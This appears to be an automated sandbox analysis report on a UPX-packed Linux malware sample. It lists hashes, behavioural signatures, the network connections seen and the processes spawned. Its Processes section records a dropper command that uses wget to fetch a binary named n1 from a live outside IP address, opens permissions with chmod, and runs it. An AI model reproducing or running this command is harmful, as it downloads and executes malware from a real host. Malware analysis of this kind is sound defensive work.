Malware Analysis Report

2025-08-06 00:00

Sample ID 240506-3qzjbsgg3z
Target 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
SHA256 9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189
Tags
upx
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189

Threat Level: Shows suspicious behavior

The file 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

upx

UPX packed file

Deletes itself

Reads runtime system information

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-05-06 23:43

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-06 23:43

Reported

2024-05-06 23:46

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

139s

Max time network

151s

Command Line

[/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118]

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 N/A

Processes

/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118

[/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118]

/bin/sh

[sh -c wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.echo.telnet.x86]

/usr/bin/wget

[wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.130.49:443 tcp
US 1.1.1.1:53 cdn.fwupd.org udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 151.101.194.49:443 cdn.fwupd.org tcp
US 151.101.1.91:443 tcp
GB 89.187.167.5:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 195.181.164.21:443 1527653184.rsc.cdn77.org tcp
RO 185.105.4.242:80 tcp
RO 185.105.4.242:80 tcp

Files

memory/1575-1-0x0000000008048000-0x000000000804d608-memory.dmp